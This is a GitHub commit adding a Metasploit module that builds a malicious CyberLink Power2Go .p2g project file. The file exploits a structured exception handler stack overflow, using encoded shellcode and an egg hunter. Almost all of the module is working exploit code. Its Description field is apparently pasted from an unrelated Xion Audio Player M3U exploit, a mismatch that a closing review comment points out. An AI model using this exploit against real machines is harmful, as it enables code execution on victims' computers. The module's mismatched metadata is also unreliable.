Exploit for CyberLink's Power2Go application. I find this software installed by default on a lot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.
commit 9b0c211160b1a74ee38ff77a34e1e6737bdc7c48 1 parent 762324e
@net-ninja net-ninja authored
Showing with 116 additions and 0 deletions.
  1. +116 −0 modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
116 modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
@@ -0,0 +1,116 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CyberLink Power2Go name attribute (.p2g) Stack Buffer Overflow Exploit',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in Xion Audio Player prior to version
+ 1.0.126. The vulnerability is triggered when opening a malformed M3U file that
+ contains an overly long string. This results in overwriting a
+ structured exception handler record.
+ },
+ 'License' => MSF_LICENSE,
+ 'Version' => "$Revision$",
+ 'Author' =>
+ [
+ 'modpr0be <modpr0be[at]spentera.com>', # initial discovery
+ 'mr_me <steventhomasseeley[at]gmail.com>' # msf module
+ ],
+ 'References' =>
+ [
+ ['OSVDB', '70600'],
+ ['URL', 'http://www.exploit-db.com/exploits/18220']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'InitialAutoRunScript' => 'migrate -f',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
+ [ 'CyberLink Power2Go 8 (XP/Vista/win7) XP Universal', { 'Ret' => "\x28\x4b" } ]
+ ],
+ 'DisclosureDate' => 'Sep 12 2011',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The output filename.', 'msf.p2g'])
+ ], self.class)
+ end
+
+ def get_payload(hunter)
+
+ [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
+ enc = framework.encoders.create(name)
+ if name =~ /unicode/
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+ else
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
+ end
+ # NOTE: we already eliminated badchars
+ hunter = enc.encode(hunter, nil, nil, platform)
+ if name =~/alpha/
+ #insert getpc_stub & align EDX, unicode encoder friendly.
+ #Hardcoded stub is not an issue here because it gets encoded anyway
+ getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
+ hunter = getpc_stub + hunter
+ end
+ }
+
+ return hunter
+ end
+
+ def exploit
+
+ title = rand_text_alpha(10)
+ buffer = ""
+ buffer << "\x41" * 778
+ buffer << "\x58\x28" # nseh
+ buffer << target['Ret'] # seh
+ buffer << "\x5f\x73" * 15 # pop edi/add [ebx],dh (after byte alignment)
+ buffer << "\x58\x73" # pop eax/add [ebx],dh (after byte alignment)
+ buffer << "\x40\x73" * 3 # inc eax/add [ebx],dh (after byte alignment)
+ buffer << "\x40" # inc eax
+ buffer << "\x73\x42" * 337 # add [ebx],dh/pop edx (after byte alignment)
+ buffer << "\x73" # add [ebx],dh (after byte alignment)
+ buffer << get_payload(payload.encoded)
+
+ p2g_data = <<-EOS
+ <Project magic="#{title}" version="101">
+ <Information />
+ <Compilation>
+ <DataDisc>
+ <File name="#{buffer}" />
+ </DataDisc>
+ </Compilation>
+ </Project>
+ EOS
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create(p2g_data)
+ end
+end
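Review bot: the 'Description' text (the `%q{ ... }` block right under 'Name') describes a stack buffer overflow in Xion Audio Player triggered by a malformed M3U file, which contradicts the module's own Name, the `msf.p2g` FILENAME default and the `.p2g` XML project that `exploit` actually writes; it reads as pasted from another module and should describe this bug instead, e.g. "This module exploits a stack buffer overflow in CyberLink Power2Go 8. The vulnerability is triggered when opening a malformed .p2g project file whose DataDisc File name attribute is overly long, overwriting a structured exception handler record." Please also double-check that the OSVDB 70600 and exploit-db 18220 references belong to the Power2Go issue and were not carried over with the text. The target label 'CyberLink Power2Go 8 (XP/Vista/win7) XP Universal' is self-contradictory (multi-OS and 'XP Universal' at once); since the comment says `Ret` 0x004b0028 lives in Power2Go8.exe itself, 'Universal' is the defensible claim, so drop the 'XP' qualifier. Minor style: `if name =~/alpha/` is missing the space after `=~` that the earlier `if name =~ /unicode/` has.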